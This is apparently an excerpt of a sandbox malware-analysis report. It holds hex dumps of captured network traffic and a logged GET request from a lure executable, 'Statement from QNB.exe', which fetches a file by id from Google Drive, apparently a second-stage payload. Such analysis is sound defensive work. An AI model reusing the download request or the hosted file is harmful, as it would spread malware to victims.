                                                                                                  2021-11-24 13:17:06 UTC341INData Raw: 5b 27 fa 53 72 cd 24 b8 0b 2f 79 36 70 8f 8d df 2c e6 17 38 8c ac f3 2d f4 ed 7d d7 86 98 cb 38 53 24 2c ea 33 3b 30 f1 c0 99 10 a4 bf bb e9 1b 32 74 7e 34 7d dd ac 84 6c 8d 89 c7 42 31 c9 b1 fe e5 7a e3 a0 43 ca e7 64 24 ea 55 74 80 99 af 97 96 e0 d8 ff 38 f2 ec 33 89 c2 de e2 30 ed e3 6c 3d ca eb 8a 05 3a 8e 46 64 3c 62 37 a1 ed 0f 3b b2 39 e6 3b d2 20 8e 82 59 4e 9e bf 47 a8 bb 54 bf 6c 66 51 2d bd 84 bb a3 53 b8 c2 2c 5d 14 24 78 6c 0f 80 e4 42 dc b0 c2 47 59 d9 46 a8 77 a0 15 13 7c 3a 00 be f3 44 ce fa 69 0e 60 76 3f 67 eb 30 13 a8 3e b3 6a 72 c0 e1 ba 2c d5 36 d9 36 ad 4a 06 98 96 e3 ca be 59 86 78 c5 83 5d 32 99 66 8f c4 09 02 dc 76 6a fd 8a ca 15 b3 5d 6a fa 5a 31 5d 66 9a 77 f9 b2 d5 24 a1 d3 3e 09 99 ce 17 f5 0c da d7 9b 80 fd 20 10 7c 51 6b dd
                                                                                                  Data Ascii: ['Sr$/y6p,8-}8S$,3;02t~4}lB1zCd$Ut830l=:Fd<b7;9; YNGTlfQ-S,]$xlBGYFw|:Di`v?g0>jr,66JYx]2fvj]jZ1]fw$> |Qk
                                                                                                  2021-11-24 13:17:06 UTC342INData Raw: d2 de 32 ee ff 8c 19 c7 76 48 79 80 44 d5 70 f7 da 27 bb e1 9f 59 b2 30 0b 43 b6 05 ce d5 14 75 3c dd 95 af 39 56 3e 3c 21 93 57 3b 71 c9 ef db e6 34 a6 76 3e f4 01 10 c4 fe 96 61 82 91 e6 f4 55 9a 91 6c 36 5b 1b 1c 3b b0 c3 4a a4 12 e0 5e 94 92 06 06 fe bb ee 5f 9d ab 7c 4d 1a 8c 3d 6f 56 3d 81 1d 91 e1 de 5a ef b4 78 55 4e b6 5c d3 68 a7 c7 2a 59 1a 0e 32 8d 69 ef 5b e8 8e 37 70 a3 f3 f8 5f 70 9c 5f 5f 5d 1a 69 4d 3a bc 04 83 95 9f 95 2c 15 6e 0f a5 a3 0c ba 9e 1d 17 08 3a 37 f8 0b 60 82 7f 46 d8 0c 5b 1c 3a f4 e2 cc 6c b8 2c 82 61 01 d8 20 98 3e ad 7c cd 9b 05 77 f5 b1 33 16 af cc 1f 58 9c a6 3d 29 4c 56 16 56 7c a7 08 b0 72 84 6f bf 12 27 a6 35 ab ff 3e 4f 86 c7 df 0c cb 6a a2 2c 94 14 5b 06 90 da f4 57 56 01 a8 5a 81 cc 0a 6c ab ee ae 45 05 b7 7a be
                                                                                                  Data Ascii: 2vHyDp'Y0Cu<9V><!W;q4v>aUl6[;J^_|M=oV=ZxUN\h*Y2i[7p_p__]iM:,n:7`F[:l,a >|w3X=)LVV|ro'5>Oj,[WVZlEz
                                                                                                  2021-11-24 13:17:06 UTC344INData Raw: 76 a2 ca f9 4b cc e2 95 15 0c 56 a8 26 48 cc 8c 0c 43 b4 39 d0 10 f8 fd 80 a4 61 ea 22 88 78 9e ae 5c 95 45 b0 d6 45 a1 de 96 6e 41 ff d6 05 49 b4 eb 8e cf c8 65 8e 53 47 31 e9 a4 52 c2 1f c1 64 df 1b 7b 30 03 1e b2 ee 74 1b 88 cc be ac 48 a5 b1 80 00 c9 67 18 bf 39 ad 41 1a 12 81 88 d0 26 3e d1 1d 20 57 0d 00 39 d6 98 99 94 b0 69 3e ec 71 bc 0c ab c1 a2 66 9e 80 b9 21 28 4c 55 25 da be 6e 64 d5 6f 42 23 a2 bb bb a2 a3 6e dc ce 85 24 45 97 0c 06 64 bf 66 02 61 79 b4 28 96 af a2 56 dc 20 38 4a f3 b3 c6 56 14 b0 23 4c 91 46 3f 56 f3 28 00 af 59 3b c2 9a 2b 78 70 4b ca 6d 52 1f 7d d1 95 33 7d 9b 0f 40 5c 4a e2 c3 d6 ea 1a 89 df bb eb f8 e4 4b 90 d6 9f 23 8c 5f 36 1c 37 f9 bf d9 fc 49 28 1c c4 52 07 1b 2c 02 69 b6 b3 13 dc a7 a4 f8 54 20 87 11 51 c7 49 00 20
                                                                                                  Data Ascii: vKV&HC9a"x\EEnAIeSG1Rd{0tHg9A&> W9i>qf!(LU%ndoB#n$Edfay(V 8JV#LF?V(Y;+xpKmR}3}@\JK#_67I(R,iT QI
                                                                                                  2021-11-24 13:17:06 UTC345INData Raw: 01 6e 75 9f 61 a9 c0 a4 12 a4 29 e1 95 45 f4 c9 9a e7 97 53 b6 22 f0 e0 32 dc 65 55 67 65 30 1f f1 02 44 6c 88 af d4 f1 87 6e 93 9c 82 f7 29 9c e4 ec 66 73 09 ed 71 39 86 21 a1 6b 76 6f b4 5f 16 ab cf cf 74 40 47 a5 f2 8f d6 2f 7a 80 30 a7 ff 84 46 cb 27 15 44 e4 21 28 2e ff b8 15 e4 6c ee 08 d9 12 97 22 63 c9 52 e7 25 f6 60 c6 3b 44 3e b8 09 55 85 45 60 63 dc 48 d9 87 63 36 19 35 bc 85 42 da cf 35 7d c4 33 b5 e7 b4 17 1c cc bf 3c a5 29 6c 98 9c 8f 76 1c 5b 75 90 4c 20 4b 79 ad 5c 94 aa c9 1f 2e a8 21 8d 66 4a cd 27 91 60 66 41 c8 9d 14 56 cf 1a ea 21 7f 4f 89 8a 9a ec 75 02 e7 01 bb 96 41 fb a2 41 1b 46 9a 78 69 7f fe 15 fb 13 36 ab 68 22 82 75 fc e6 34 1e 37 96 52 00 6a a7 c7 38 fc 53 84 b7 94 d0 46 5a 83 e5 d2 2d 71 68 40 48 9e 37 14 18 fc a8 77 07 7b
                                                                                                  Data Ascii: nua)ES"2eUge0Dln)fsq9!kvo_t@G/z0F'D!(.l"cR%`;D>UE`cHc65B5}3<)lv[uL Ky\.!fJ'`fAV!OuAAFxi6h"u47Rj8SFZ-qh@H7w{
                                                                                                  2021-11-24 13:17:06 UTC346INData Raw: c3 cb 94 0e a5 04 34 30 f1 e9 83 bb 17 26 76 44 98 3b 83 33 dd c2 52 5c db ae 4e 5c 13 73 e9 bb c8 50 21 d2 a6 56 b8 7f b5 69 c6 68 5c 90 8f 2e 1d 2e cf 20 96 7f 84 0f c5 c4 44 89 59 8c 39 7a 38 c7 9e 94 00 be ce cd 1e 6d f8 a5 59 c4 35 bb 6c b9 20 ed d9 28 58 dc eb fd be 62 44 49 2d 2c d3 af b3 52 55 54 39 01 7c 5b 13 ea 5f d6 56 27 9d 30 0e 20 73 ba bd 99 92 70 1c da 83 21 28 d2 e4 dd a6 fc 3a 47 60 66 cd 5e a5 ff 8b 0a 9f e0 c4 ca d4 34 86 03 d4 b2 be 1c e2 38 75 d2 60 9e 76 0d 02 a3 5a 3f 4e 51 87 75 f5 43 03 48 c7 2d e4 ce a8 44 b6 e2 c0 97 37 c9 d0 13 c8 48 0f 8a 91 b2 2e 16 cb 59 28 6b 0d a3 4f ed 55 e6 d4 55 a9 67 4d 06 03 32 5a 81 5b 33 a9 00 14 c5 3c 67 ca 68 6e 46 4e b6 b2 90 d6 d7 82 61 15 8a a5 e4 01 6f 98 2e cf e7 da ce 2e 87 7f be 23 3b ad
                                                                                                  Data Ascii: 40&vD;3R\N\sP!Vih\.. DY9z8mY5l (XbDI-,RUT9|[_V'0 sp!(:G`f^48u`vZ?NQuCH-D7H.Y(kOUUgM2Z[3<ghnFNao..#;
                                                                                                  2021-11-24 13:17:06 UTC347INData Raw: 9e 1d 69 0d a7 5a fb fa a6 4d f0 b9 2e 71 5a 7a 38 68 13 df af 61 46 30 0d 82 a6 50 4b 52 87 be 5e b9 d0 da 99 54 74 9b 70 de 90 89 26 51 2e 3e 06 e8 f7 66 c6 0a f1 dd 54 be a1 47 54 7d 2a e0 69 c0 8b c7 0e c5 e4 fa 0a b1 bc 70 ce 1b e6 0e 39 b4 2a fb 9b d6 a3 2d 68 ce ac 8f 86 ee d8 d6 53 4a 89 fa 92 98 31 3e fb 8c ef a0 c6 77 f8 18 79 53 07 ed 36 98 2c 5f 68 c4 f8 aa 2d b1 bb cd fa 7e 8d d8 14 b0 5e 3f da af 64 85 a8 7f 83 a5 b6 6f dd 40 94 87 24 c7 4a 6a e8 83 51 3a 5e 74 1b dc 77 9e 64 79 dd 86 b3 cb f0 b4 3a 23 a6 8b 7a 5d 9c 1a 2c e7 7f 06 14 ac f6 3e 98 ff 7b 91 c8 46 0a bd a6 bb 0a cc cf cb 60 d3 ea 32 fb 96 a1 ab 8a d6 68 82 ce b7 ee 46 b3 7e 1c a1 6f a7 68 a1 36 59 d3 e2 8e a0 f0 cb d4 f6 09 64 f9 e0 bc 00 b3 f6 4e 36 c7 a2 19 0a 25 30 73 35 6b
                                                                                                  Data Ascii: iZM.qZz8haF0PKR^Ttp&Q.>fTGT}*ip9*-hSJ1>wyS6,_h-~^?do@$JjQ:^twdy:#z],>{F`2hF~oh6YdN6%0s5k
                                                                                                  2021-11-24 13:17:06 UTC348INData Raw: 30 21 02 da 3f a0 6c 9a 26 5f d3 9c 46 f4 c4 18 d9 eb df ad 95 0c 57 08 6d 65 75 51 c7 3c 80 a0 a6 99 b6 15 7d 58 64 f2 e7 50 15 a2 a6 63 39 7e b5 f9 fb 86 65 fe 5a 62 47 5e a4 c1 97 86 01 6e fe 02 ad 2b e1 7a a1 88 48 22 70 7d 7b ab 26 13 9a ae 40 db e5 db 8c 08 21 fd e8 3a 33 2c ec 82 72 1c b7 b3 e8 66 ff 13 43 83 cf ca 74 a9 23 df 67 43 4e ea 7e 2e 03 6a 36 e5 04 d5 d6 72 51 83 a8 ba a6 45 3c 03 a0 0a d4 69 84 0e b5 75 74 b1 fb 3e 41 82 5e 4b cb 03 83 1e 6b 05 3c 50 11 fd aa 4c 83 64 d2 29 5f a0 8d 9b 0e 46 9e b2 18 42 73 89 4c 17 b2 93 24 0f 0b 56 f7 52 a2 50 35 8a 44 9e 66 67 ec 5a 6f cd 2d 96 0c 36 ea 44 e7 74 1e be 0c 9b 05 67 32 f7 d1 df 10 98 bf 0e 8e 17 f6 7a ee cf 6f d4 93 ae 4e 54 b0 f6 fd 97 f0 27 9f 60 63 1f 31 c4 a8 2b 85 62 e3 cc bd 29 4a
                                                                                                  Data Ascii: 0!?l&_FWmeuQ<}XdPc9~eZbG^n+zH"p}{&@!:3,rfCt#gCN~.j6rQE<iut>A^Kk<PLd)_FBsL$VRP5DfgZo-6Dtg2zoNT'`c1+b)J
                                                                                                  2021-11-24 13:17:06 UTC349INData Raw: 2c ef b8 a6 33 07 47 f2 f7 18 5b 47 0f 11 5f 0d 14 2d 79 ba 74 44 e9 c5 22 d5 ac a7 33 72 b0 8e cd ac f1 45 00 ae 2c 3f 6b b6 57 bf 5a ae 2d 74 a5 3d 49 5d 13 ea 73 de c5 98 2c bf 39 38 4a 55 49 14 fd 8b 9e 29 7e 92 5b b7 91 c4 9f 90 3e 79 de e1 73 0c 8f 46 0e 5e 0c 82 47 d5 f8 5d 00 8b 42 a0 d3 d9 f5 7a ef 53 6a 73 f9 7a 49 aa ba d4 b4 f5 a2 ce 4a ca cf 89 1e 85 02 05 92 a0 76 b8 99 3c 1e fd f6 d3 d4 5b 11 db d0 85 34 44 fb 4d 80 80 6e 50 07 64 c1 43 c2 39 fb ef f4 21 c1 21 da ac 12 88 7d 0b b7 9e 14 7e b6 3d ec 68 55 9f d8 46 a1 d3 fd 01 9a 04 bb 2d 51 87 43 da ba 09 59 a1 7f 98 0b 89 be 1f 92 47 bf ee 9d 95 9c e2 6f b3 2c b5 a4 7b 51 fa f6 32 f8 1e 2b ee 9b bd 05 d5 6d 2b f1 f8 0d 94 04 a0 41 81 b1 06 a3 9b 8d 29 17 b3 c5 e4 9f 34 68 af 2c c3 3c cc 4b
                                                                                                  Data Ascii: ,3G[G_-ytD"3rE,?kWZ-t=I]s,98JUI)~[>ysF^G]BzSjszIJv<[4DMnPdC9!!}~=hUF-QCYGo,{Q2+m+A)4h,<K
                                                                                                  2021-11-24 13:17:06 UTC351INData Raw: fc 81 ed 95 9f e9 34 01 a2 a1 b7 c7 38 86 b3 d9 77 20 74 28 c3 57 3b ec 61 81 fc 70 62 cc f6 58 32 b7 d9 60 70 78 49 2c 99 a1 fc 08 04 3a 57 b3 44 9c 75 4e 34 3f d1 e5 9f 86 d2 5c 29 99 ba e3 34 61 18 3c 7b 6b af 3e 6e af ff 10 98 8b 1d 6a ac 8e f8 f0 99 4a 6b 8d 85 94 59 10 d6 16 95 15 ab 90 df c1 26 16 87 9b d7 41 00 94 07 65 18 33 06 74 9c 57 d6 a6 b9 70 86 3c 86 4b 5c 12 9d a8 2d f3 a3 db a9 61 b5 02 58 f0 7d f3 9a ca 8b f1 0a 1c 16 a5 f5 c5 5a 7e 50 94 52 6f 3c df b0 5b 9e 8e 0b 3b da 8e 24 cb 5a 10 7b ce fc 15 5a 72 76 cd d9 48 37 42 dc 13 ae 32 65 b4 27 7a a5 3f 69 4d c9 60 b4 2f e7 78 1e 68 9e d0 fd f0 84 d6 c7 da e1 03 09 20 c2 83 76 c2 e2 16 ef 03 d3 b9 46 e6 c4 2e 85 de 8e 69 83 6e 96 79 6c 0d e8 e5 f3 49 8d 9f 0b 85 84 62 56 7b 86 e6 45 3f 4b
                                                                                                  Data Ascii: 48w t(W;apbX2`pxI,:WDuN4?\)4a<{k>njJkY&Ae3tWp<K\-aX}Z~PRo<[;$Z{ZrvH7B2e'z?iM`/xh vF.inylIbV{E?K
                                                                                                  2021-11-24 13:17:06 UTC352INData Raw: 27 94 47 b7 a2 71 e9 9e 92 a8 35 56 dd b2 7d 63 1b 61 e8 1f a4 8f 0c 02 6e 2b 8f 97 d3 20 af ae 02 96 fd 69 92 85 9c 8c e0 63 a2 ff 06 47 c5 e3 11 b7 2f 97 1a 28 5c 12 51 96 bb 85 34 98 b6 2a 1f 96 f3 3e 08 08 71 27 cd ef 46 f3 e3 c2 d4 fe 9e c9 93 70 19 8b 4b 15 0c c2 bc ca bc a0 c7 de 0b 3d 08 5a d1 ad 39 a3 e4 2d 67 25 1f 59 8f 40 bf b9 cb 88 8d b7 7d 60 45 f0 92 ea 15 4e 34 7b a8 f6 8d c8 93 0e d5 5d fe be ab ed 8d ea e5 06 4f 69 72 c3 fc 9e 3f 00 16 47 b9 0c fb 68 53 62 99 42 1c e1 cd 4e 27 2a 9f ed d7 00 06 b4 a0 93 4d 81 9c 28 55 a7 9f c3 7a 4f 10 bf 67 2c ca 2b 1e 22 49 ff fb 8d a6 37 6c 98 36 4b 00 63 8b 39 2c df e3 13 79 a1 75 34 50 56 43 79 a2 52 53 ea 7c b4 41 06 19 05 2f 68 34 8a 23 03 e8 0b 45 1f 2a 87 cc 18 7e 70 a5 12 3e 09 e2 95 b2 01 f1
                                                                                                  Data Ascii: 'Gq5V}can+ icG/(\Q4*>q'FpK=Z9-g%Y@}`EN4{]Oir?GhSbBN'*M(UzOg,+"I7l6Kc9,yu4PVCyRS|A/h4#E*~p>
                                                                                                  2021-11-24 13:17:06 UTC353INData Raw: 17 b9 fe 60 07 ae f8 17 90 41 de 3c 41 80 45 26 ed 22 f8 8e 12 e9 e3 6b f0 a1 95 21 64 7a 79 38 32 8b 8f af 6b da 51 95 54 65 b9 12 16 ae 05 dc a0 8d 36 4e 37 f6 07 10 e8 df 59 d5 7e c4 0f 15 31 c0 5a c6 b2 b6 0f ca 6e 7e b4 a3 54 2c ea 28 d5 b0 10 a9 99 af b2 66 f8 b3 ca 3d 34 12 4e be cf 3c 54 ca 1c 86 b0 ea 07 2e 10 ad b3 f9 f2 f0 e8 f3 ce 13 4d 24 2f 1a 03 e8 54 41 c5 ef 8e 51 a6 2a ff 0f 07 03 5d fd 56 f5 e8 67 22 05 67 cb 2a db 40 d1 b4 6a 44 2b 07 8f 65 ed 92 07 d1 74 9d 90 9f ce a8 bc 49 57 81 ee 8f cd 13 6d 7a 5c 3d d5 e1 16 55 82 81 f0 6a 1a 2d 62 0f e1 8d ab a0 b0 c7 0c 91 68 d5 23 fa a8 4f fe a5 52 e2 37 a3 5b b0 c6 74 dd 62 40 21 55 60 42 d5 bd 2e be 4b e5 e3 d8 45 e1 2a d2 d1 ee ae 6b 66 c4 dc 76 62 dc f8 a9 72 5d 74 dd cc 39 17 03 ad 53 10
                                                                                                  Data Ascii: `A<AE&"k!dzy82kQTe6N7Y~1Zn~T,(f=4N<T.M$/TAQ*]Vg"g*@jD+etIWmz\=Uj-bh#OR7[tb@!U`B.KE*kfvbr]t9S
                                                                                                  2021-11-24 13:17:06 UTC355INData Raw: 01 fc 89 4b d0 07 f1 c7 af c0 5f 3b 46 0e a9 fe 5d 79 26 f8 0d 5b ed 34 b1 be af 41 b9 13 ed db ec 1a 09 1b 47 55 e3 67 c7 ba b9 6d dc 23 fd 4e 5d 46 43 09 ef f2 de bc 12 d7 e5 b5 79 57 82 91 f7 c2 b6 90 38 47 82 9a 58 a2 3a 04 3f 6c 6a 6a 09 2c e4 3c dc 71 a2 9e 83 6e bc 57 79 c0 24 34 88 3e f3 de 35 eb a9 55 0d d4 0f 68 de d3 1e 31 54 6d 9b 5a b7 a5 28 2a f5 a4 f2 2b 00 f3 7c 6b aa 0b 64 d8 d2 93 9f db 89 94 99 00 2a 10 e3 c2 0d ee 76 cc e3 68 22 a6 15 bb 17 cd ab cc 26 d9 2c 19 1f ed 38 17 31 7a de 9c 5b 8b 57 0b 80 b6 cb 29 5e da 60 5c 8e 60 96 5e b0 9d b9 6c dd 0e 43 ab db 0a 90 da e7 b2 4a 99 8d 01 17 7c e0 99 62 53 48 85 31 98 40 0d 01 ae fd 3a b6 bd 73 5b 4e 81 f6 ff 1f cc 1e 63 45 b7 a3 70 7c 46 fa 13 05 62 85 24 2f f4 4d 72 9f dd 48 94 05 4b 22
                                                                                                  Data Ascii: K_;F]y&[4AGUgm#N]FCyW8GX:?ljj,<qnWy$4>5Uh1TmZ(*+|kd*vh"&,81z[W)^`\`^lCJ|bSH1@:s[NcEp|Fb$/MrHK"
                                                                                                  2021-11-24 13:17:06 UTC356INData Raw: 4c e2 f0 8c 65 2d 98 5d db b3 93 c9 09 ba 50 20 d7 aa e8 68 3a ae 2e 01 31 25 dc 44 e5 e1 1e 1a 60 e6 1b 41 a1 3e 96 4c 8f 28 29 ab 3c d1 bf 42 65 ba 10 35 93 cd 26 91 8f 93 01 63 ec 21 28 f5 60 f6 fa 71 05 24 fc 5a bd 23 8c bb 2c e9 5f 54 13 61 59 fc ab 31 77 15 3e fd 6f 4f 33 df c2 81 d0 05 f5 eb 58 b8 3f 70 bb cf d5 f8 55 de b8 65 02 a5 7a e1 7d e1 65 32 a1 9a 7a ad 73 64 44 10 25 c3 54 a7 cc 92 87 9e c0 78 3b cc eb 07 5c 66 86 85 a3 38 a6 6a 6e 22 4b 42 3c d3 6c 76 f5 d5 5a 49 41 b3 d8 4f 32 37 b4 7c f0 1c dd 97 b3 77 28 3a 8d da 33 2e e9 f2 ea e8 03 b3 82 ec 71 da 15 d2 85 bb 9c 9a 0d c4 f8 d5 ad 89 ca a4 6a 6f b3 e4 c3 b5 54 46 75 6a 13 4f 8d a2 1e 60 b3 df 06 44 b4 85 16 e4 df 20 00 63 e9 4e 37 c5 4b 7b 68 74 f5 4e 3a fa 6d 9c 93 a0 aa e8 18 b5 1f
                                                                                                  Data Ascii: Le-]P h:.1%D`A>L()<Be5&c!(`q$Z#,_TaY1w>oO3X?pUez}e2zsdD%Tx;\f8jn"KB<lvZIAO27|w(:3.qjoTFujO`D cN7K{htN:m
                                                                                                  2021-11-24 13:17:06 UTC357INData Raw: 95 9f 77 58 a0 1d ac 52 cd 1c 71 29 bc 62 4f e5 ac 83 35 2d c2 52 0b 96 ec 17 5b 87 d9 8e 92 b7 8f 19 ea a7 e7 13 49 3c e3 9d 72 f4 7b 08 7f e4 2c 5e bc f1 9f 15 47 61 34 a3 b3 ac 81 30 52 d0 27 95 08 10 52 3e f3 b8 69 d0 59 d6 74 f0 4f 12 30 a8 41 8a b9 fa e7 d4 38 55 d2 7e 81 2d 84 7e 3a 5a 9b 5c 08 35 1f 83 e7 25 8b ea 69 6a 70 1a 85 d8 02 bd 41 b9 08 9d 8f 69 15 e5 33 30 34 20 66 01 ff 80 4a c0 12 f1 0b ab ba 64 a0 b4 ff 82 ff 51 a6 32 34 78 0c 79 de aa e1 f7 fc b4 35 3d 5e 19 ab 7d 12 7d e1 43 d1 91 e7 33 29 63 8c 72 68 2d c4 95 7f df 6b 2c 3f a5 99 a7 38 25 62 88 47 46 98 c1 0b 0f 17 2a 2e 71 bf b1 fc c1 f3 9e 34 db 32 6a 98 de 4c b8 58 f3 8c e0 05 5a 29 da a4 fe 18 2a 24 3d d9 53 8c eb 62 28 49 9b 5e 03 41 25 6d 31 7a b1 b7 8b b1 3b 5e 77 58 8d ef
                                                                                                  Data Ascii: wXRq)bO5-R[I<r{,^Ga40R'R>iYtO0A8U~-~:Z\5%ijpAi304 fJdQ24xy5=^}}C3)crh-k,?8%bGF*.q42jLXZ)*$=Sb(I^A%m1z;^wX
                                                                                                  2021-11-24 13:17:06 UTC358INData Raw: 39 1f e5 90 82 9f bb 4a 9c 18 06 6a 0e b0 04 19 43 3b ae 35 10 3f 44 5f 50 bc 26 09 d5 ce 76 57 2f 85 3a e2 ce cc a8 3b 47 c7 d5 d4 10 3b 1e bd 8f 5f 85 ee 9a 23 69 a3 91 01 1d 6d 96 9e ff df db 77 db a8 c7 c2 aa 02 ab 1e a2 d0 55 9f 47 b1 42 64 8e 4f 94 6c bb 89 67 8d cf 2c fa ad f1 ea 68 f4 2f d5 37 75 46 bc 62 3c e5 be c8 b0 5a 23 7a 62 2e b2 17 0a 56 dc de 45 ba 08 59 ae dc c7 49 e8 8c 5e ee 2d 15 80 8f 70 bc 46 db 6f 17 a9 69 ff f0 2c 29 84 2c a5 06 57 ba 9d cc f0 ff a1 67 12 77 0d b4 68 db a7 f4 e6 c6 01 9b f5 e6 88 c2 e5 c0 49 73 78 89 80 62 25 df 06 db f8 f3 db b3 9c c0 c2 ab f9 98 1e 45 d8 7d f8 d8 de 10 1e 59 8f bb de b8 cd af 3c c4 6a b5 29 32 69 08 e5 b7 89 1c 4e 42 d4 fb 84 d8 d3 80 fb 39 5f 52 da 28 0d 04 e1 0b 29 8b 22 99 dc 39 f2 cc 92 22
                                                                                                  Data Ascii: 9JjC;5?D_P&vW/:;G;_#imwUGBdOlg,h/7uFb<Z#zb.VEYI^-pFoi,),WgwhIsxb%E}Y<j)2iNB9_R()"9"
                                                                                                  2021-11-24 13:17:06 UTC360INData Raw: 15 d7 a1 15 0f 6a a4 5f 69 dc f3 7e 29 75 ae b6 8e 77 f9 3c 02 ae e4 07 68 e1 33 0d fb 76 fd c5 33 b1 c9 87 6a 1e 74 18 6c ba b1 bc 31 1f ca 64 f6 a2 29 4a d5 f7 39 00 0a d6 a2 69 f1 16 ab e1 34 64 aa 2c 7c 59 0c 76 d8 0d 16 6f da ed 44 35 d7 87 dc 2f 98 2a 66 0d f7 97 62 0c 61 2d 3a 67 07 0b ba 1e 3b 2e 79 1a 50 82 fb a0 ef a5 99 0a 83 44 59 b4 93 11 91 0c 4c 46 07 32 0c a0 fe f2 4e 3d 63 89 1c 8f aa 25 a6 49 f3 05 aa e4 29 70 8b 0d 1c 91 55 ee bc 02 16 07 ea 65 ce 6e 00 3e de 50 b0 4f 46 dd 71 95 d5 79 97 6e a7 56 29 5b a4 9f c7 59 5b 30 e6 d1 72 2d f2 46 d7 55 aa a8 57 d2 c8 dd 0e 84 1c f2 74 27 1c 6c 53 a6 d7 20 df 86 4d 3f 51 fb 74 04 bc 03 a0 bb f0 e7 29 5f 53 d5 95 0e 8d 69 37 4e e3 14 0a 70 ba dd fa 11 06 43 c9 b0 f3 07 fa 02 54 0a 86 69 0f 02 5d
                                                                                                  Data Ascii: j_i~)uw<h3v3jtl1d)J9i4d,|YvoD5/*fba-:g;.yPDYLF2N=c%I)pUen>POFqynV)[Y[0r-FUWt'lS M?Qt)_Si7NpCTi]
                                                                                                  2021-11-24 13:17:06 UTC361INData Raw: fd 44 e5 b0 71 22 b5 d0 2e 5d b5 c4 54 3d 3a 08 98 b5 a8 50 9f bc ad 34 ef c1 c7 64 bb d9 3a 87 c7 e2 6c 0c b4 34 1c 66 f7 41 45 3c 20 7e 3d 1e ff 03 2c 54 0a 84 77 b4 be bd 1f d2 99 0a bb e8 18 5e ea b4 57 b2 51 c5 2e e7 95 fe 91 8f d8 a5 af 3b bb 0e bb 35 4d 11 af 6e 43 ad 87 9e bc af e1 aa 9d d3 87 87 02 bd 65 0b c2 b1 34 87 c2 2e 4e c8 9a c7 9c fd 46 b0 6e 0a 24 86 70 ad e1 3f e3 39 3c a6 ab 0e 11 25 30 fa 3f 30 de 23 1c 45 ea 9e 04 77 d2 44 2d 4a cc 27 fb 10 8f 6c 2f 18 ce dd 62 60 f7 38 b7 ae 42 eb 4f c2 b7 12 57 b1 60 81 10 ba a6 19 88 55 99 4c d1 5b 5f e6 cd ea 2c 02 47 04 87 1d 73 38 3c 89 2a b3 d2 76 69 d9 62 49 ae 9a 59 48 13 95 b6 9d 53 fb f1 8f 69 38 d8 f3 c6 0e 9d 5d 57 95 7b c8 11 8a 15 4b 09 82 b7 c7 3b be 81 ba 7c 15 99 26 5d 85 aa 79 7f
                                                                                                  Data Ascii: Dq".]T=:P4d:l4fAE< ~=,Tw^WQ.;5MnCe4.NFn$p?9<%0?0#EwD-J'l/b`8BOW`UL[_,Gs8<*vibIYHSi8]W{K;|&]y
                                                                                                  2021-11-24 13:17:06 UTC362INData Raw: 4e f3 13 7c 19 21 27 11 b6 bf 88 a1 8c c9 32 c7 4e 10 9b d4 24 c9 39 0d 02 43 7b 42 a6 ae d1 0a 0b 2a a8 5b b9 f2 06 e7 64 b7 39 e4 d0 79 31 cf 71 55 d1 12 b7 e4 14 57 2a ae 40 80 4c 50 3b 9a 71 f9 72 01 e6 29 b7 94 54 d3 57 e9 65 79 73 e0 b4 8e 79 1c 68 be 81 33 3c b6 7f 99 76 fa 88 13 e2 81 f6 49 dc 44 a2 35 53 58 2f 1d e0 87 2d 9b a7 04 16 16 c2 2c 38 fd 04 e4 9d be d0 79 67 17 e3 dc 29 ca 56 6f 76 a2 24 4e 39 f4 c2 aa 13 42 4e 80 a6 b4 5f a2 52 15 7a c2 2a 41 44 0d 99 c0 c4 34 04 e9 b0 4e ee 32 c7 b7 7c 77 2e 20 5d 4f fe 21 ca e8 ef c8 f9 00 db a5 a5 ce ec cd e2 92 9f 30 a9 5b 4c d8 4a cc 77 2c d0 0c 98 e7 33 b5 9b 64 fd 73 d1 39 e3 8f cc 2d 11 ad cc 81 cb 5d e6 2a 7a c9 ea 95 40 1e ba 97 60 3f 9c 4c d4 9e ed e3 97 7c 7c c4 bb 3c e1 fe 7c 84 6c c6 25
                                                                                                  Data Ascii: N|!'2N$9C{B*[d9y1qUW*@LP;qr)TWeysyh3<vID5SX/-,8yg)Vov$N9BN_Rz*AD4N2|w. ]O!0[LJw,3ds9-]*z@`?L||<|l%
                                                                                                  2021-11-24 13:17:06 UTC363INData Raw: 5f 98 de 45 4d fb f1 26 4b 47 ed 7f 2e eb b2 7c 6d 55 e0 9d d6 4a a9 34 46 84 ad 2f 2f de 72 49 bf 3f b1 82 6b e8 99 f6 2e 6e 3d 66 2b d3 f0 c8 75 62 84 61 ae ca 79 0b 91 9b 70 40 4d 87 e3 6e b5 30 e5 cb 6c 51 fa 08 38 73 45 4c 9f 2e 57 2b 9e f1 0a 02 8f bb 8c 0f dc 1a 2f 26 b0 c7 23 48 25 50 74 34 5f 52 ea 1c 7f 05 30 39 17 a2 ba 85 ab 82 d7 34 db 52 09 94 d7 38 d8 27 0b 16 46 76 48 a8 b0 d7 16 17 33 a7 58 a5 e3 18 e1 70 b2 34 ee de 67 37 d3 6d 4c de 11 ab f5 0a 51 3e ab 4d 8a 42 4e 3d 86 6d e0 7d 02 fa 38 a9 92 40 d6 5a e3 6b 67 75 fc a8 97 76 1f 74 af 9f 35 28 b3 72 93 78 e4 8e 0f fe 98 f9 4a c0 55 bc 33 47 5d 22 17 ee 99 2b 87 bb 1d 19 15 de 3d 26 fb 10 e1 90 b4 de 67 61 0b ff c5 26 c9 4a 7e 68 a4 30 4b 34 fe cc b4 15 5e 52 99 a9 b7 43 b3 4c 13 6e c7
                                                                                                  Data Ascii: _EM&KG.|mUJ4F//rI?k.n=f+ubayp@Mn0lQ8sEL.W+/&#H%Pt4_R094R8'FvH3Xp4g7mLQ>MBN=m}8@Zkguvt5(rxJU3G]"+=&ga&J~h0K4^RCLn


                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                  6192.168.11.2049831142.250.185.78443C:\Users\user\Desktop\Statement from QNB.exe
                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                  2021-11-24 13:17:13 UTC363OUTGET /uc?export=download&id=1yzh40PNS32XieWw_X1Kb4gxhZiPD-fNp HTTP/1.1
                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                                  Host: drive.google.com
                                                                                                  Cache-Control: no-cache
                                                                                                  Cookie: NID=511=O8F3WUMpwif_uSvF6NVaoDKCa_B9CVpm3RXpohb-m11hovINlL1qeTsu5byj3kjM026Fjm16vkT9stNprKGWMAzUEBJm3mx3WCYZd3mzWhQ3jL6jz3aEfmVjjbe86H1cSaC9AsZUEFRORqAQuyo3SOepEKrezy-qH_LiFQvT2qU
